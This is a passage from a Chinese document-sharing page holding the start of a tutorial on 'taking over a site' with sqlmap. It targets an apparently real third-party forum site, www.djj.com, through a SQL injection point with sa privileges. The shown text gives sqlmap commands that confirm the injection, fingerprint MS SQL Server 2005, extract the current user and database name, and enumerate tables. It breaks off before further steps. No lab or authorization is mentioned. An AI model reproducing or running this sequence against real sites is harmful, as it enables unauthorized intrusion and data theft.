- 72
- 0
- 约1.31千字
- 约 6页
- 2017-01-29 发布于重庆
- 举报
sqlmap实例拿站
目标:
/yz/cn/videodt.jsp?Videoid=10此URL为sa权限猪肉一块用穿山甲不能执行命令过程如下:通过访问http://www.djj .com/login.jsp得知该站由一论坛搭建注册普通用户访问http://www.djj .com/admin/index.htm得知该站由/ejf_download.jspEasyJForum 论坛程序改编而来。
既然有了SA权限的注入点那就祭出神器sqlmap来跑下注入点启动BT5,打开sqlmap,输入命令
python ./sqlmap.py -u /yz/cn/videodt.jsp?Videoid=10
检测结果如图:
目标数据库为:Microsoft SQL Server2005接着执行命令:
python ./sqlmap.py -u /yz/cn/videodt.jsp?Videoid=10 –current-db –current-user
执行结果如图:
得到当前用户为:sa数据库名:tour-2010-11-24
接下来我们列下表执行:
python ./sqlmap.py -u /yz/cn/videodt.jsp?Videoid=10 –tables -D tour-2010-11-24
列出全部表如图:
过下载EasyJForum 原程序找到
您可能关注的文档
最近下载
- 福建省水利水电建筑概算定额(上册、下册)2021.pdf VIP
- (二模)郑州市2026年高三毕业年级第二次质量预测数学试卷(含答案).docx
- 【儿童故事】儿童故事六则 小蛋壳的故事.docx VIP
- 体外诊断试剂盒研发进展.docx VIP
- 2025届山西省临汾市高三下学期第二次模拟生物试题(解析版).docx
- 2025年供水设施管理与水质检测手册.docx VIP
- 生态保护与国家安全-环境安全与国家安全-教学课件.pptx VIP
- 《食品经营许可证》延续申请表.doc VIP
- 新课标人教版小学数学五年级下册教学用书.pdf VIP
- 2024建筑与市政工程施工现场临时用电安全技术标准.docx VIP
原创力文档

文档评论(0)